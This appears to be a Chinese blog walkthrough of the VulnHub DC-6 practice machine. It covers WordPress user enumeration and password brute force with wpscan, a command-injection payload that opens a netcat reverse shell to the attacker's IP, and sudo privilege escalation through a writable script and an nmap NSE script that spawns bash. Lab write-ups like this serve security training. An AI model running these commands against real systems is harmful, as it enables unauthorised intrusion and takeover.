首页 > 其他分享 >vulnhub靶机:dc-6

vulnhub靶机:dc-6

时间:2024-03-12 12:12:42浏览次数:26  
标签:bin jens sudo dc vulnhub home 靶机 graham bash

一:信息收集

1:主机发现

靶机IP

10.9.23.130

2:端口扫描

nmap -A -p- -T4 10.9.23.130

3:端口探测

访问失败,返回wordy的域名,在添加hosts文件:

访问成功后发现和dc2长的很像

用的是wordpress,用wpscan试一下

wpscan --url http://wordy/ -e u

扫出来五个用户名

admin

mark

graham

sarah

jens

可以选取带k01的字典进行扫,就大大缩短了时间:

cat /usr/share/wordlists/rockyou.txt | grep k01 > /tmp/pass.txt

使用wpscan进行爆破:

wpscan --url http://wordy/ -U user.txt -P /tmp/pass.txt

得到用户名和密码

mark

helpdesk01

二:渗透测试

1:反弹shell

登录网站wp-admin

bp抓包

可以发现这个位置能够发送ip

写入一句话木马并nc监听

baidu.com | nc -e /bin/bash 10.9.23.112 6666

连接成功,升级shell

python -c 'import pty;pty.spawn("/bin/bash")';

因为开启的22端口,所以找一下可能存在的用户名

graham

GSo7isUM1D4

利用ssh登录尝试一下

ssh [email protected]

2:提权

sudo -l

发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的

执行这个脚本的时候会以jens用户来执行,方法:

sudo -u jens /home/jens/backups.sh

可以让jens执行/bin/bash就直接得到了jens的shell

首先需要删除

graham@dc-6:~$ cd /home/jens

graham@dc-6:/home/jens$ echo "/bin/bash" >>/home/jens/backups.sh

graham@dc-6:/home/jens$ cat /home/jens/backups.sh /bin/bash

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

sudo -l

可以使用nmap,nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权),写入一个可执行的脚本:

echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse

这串代码的原理是利用Nmap工具中的脚本执行功能来执行一个自定义的Nmap脚本文件/tmp/root.nse。在这个脚本文件中,使用了Lua语言的os.execute('/bin/bash')命令,意图是在目标系统上执行/bin/bash命令,从而打开一个交互式的Bash shell。

提权成功

标签:bin,jens,sudo,dc,vulnhub,home,靶机,graham,bash
From: https://www.cnblogs.com/woaishuaidan/p/18068008

相关文章

  • BUUCTF靶机笔记
    BUUBRUTE11启动靶机后可以看到是一个登陆页面查看源代码:没有有用的信息只是单纯的html页面随便填一个用户:admin密码:123提示密码为四位怀疑是暴力破解使用burp进行单点爆破payload设定暴力完成查看length不同的数据包返回flag:flag{6982d5b6-a2f8-48d8-aec6......
  • BOSHIDA DC电源模块的质量控制与品牌评估
    BOSHIDADC电源模块的质量控制与品牌评估质量控制是确保DC电源模块符合一定标准的过程。品牌评估是对品牌形象、市场认可度和用户满意度的评估。下面是关于DC电源模块质量控制和品牌评估的一些建议: 质量控制:1.选择合适的供应商:与有良好声誉和专业知识的供应商合作,确保供应商......
  • vulnhub靶机:dc-5
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机IP10.9.23.2042:端口扫描nmap-A-p--T410.9.23.2043:端口探测发现contact里面他有输入框发现底下这个页脚会发生变化,猜测存在文件包含漏洞,先扫一下目录4:目录遍历dirsearch-u10.9.23......
  • leedcode 反转链表
    自己写的,遍历一遍链表,再反向生成一个新链表classSolution:defreverseList(self,head:Optional[ListNode])->Optional[ListNode]:#检查链表是否为空ifnothead:returnNone#初始化一个空列表,用于存储原始链表节点的值......
  • flnkcdc+datastream实现mysql到mysql数据同步
    一、maven依赖<dependency><groupId>org.apache.flink</groupId><artifactId>flink-clients</artifactId><version>1.18.1</version></dependency><dependency>......
  • leedcode-同构字符串
    自己写的:classSolution:defisIsomorphic(self,s:str,t:str)->bool:#使用match函数分别检查s到t和t到s的映射关系res_a=self.match(s,t)res_b=self.match(t,s)#如果两个方向的映射关系都成立,则说明......
  • AWR1243+DCA1000——硬件触发(Hardware Trigger)
    1引言对于二维滑轨的雷达扫描系统来说,当滑轨系统运动运动速度较慢时,可以忽略其启动和停止时的加速度,而假定导轨在整个导程中是匀速运行的,这时设定雷达信号的帧发射周期即可实现在整个二维扫描平面的均匀采样,此时雷达板发射雷达信号是软件触发的。但值得注意的是,这仍然是一个开......
  • MYSQL学习笔记12: DCL数据控制语言(用户操作)
    DCL数据控制语言查询用户#用户信息保存在数据库mysql的user表中usemysql;select*fromuser;创建用户createuser'用户名'@'主机名'identifiedby'密码';在主机localhost创建一个新用户createuser'hikari39'@'localhost'identifiedby'123456......
  • MYSQL学习笔记13: DCL权限控制(用户权限操作)
    DCL权限控制查询权限showgrantsfor'用户名'@'主机名';查询某个用户的权限showgrantsfor'hikaru39'@'localhost';授予权限grant权限列表on数据库名.表名to'用户名'@'主机名';授予某个用户权限#all,给予数据库itcast中所有表的权限grantallonitcast......
  • leedcode-移除链表元素
    自己写的:#Definitionforsingly-linkedlist.#classListNode:#def__init__(self,val=0,next=None):#self.val=val#self.next=nextclassSolution:defremoveElements(self,head:Optional[ListNode],val):#初始化一个......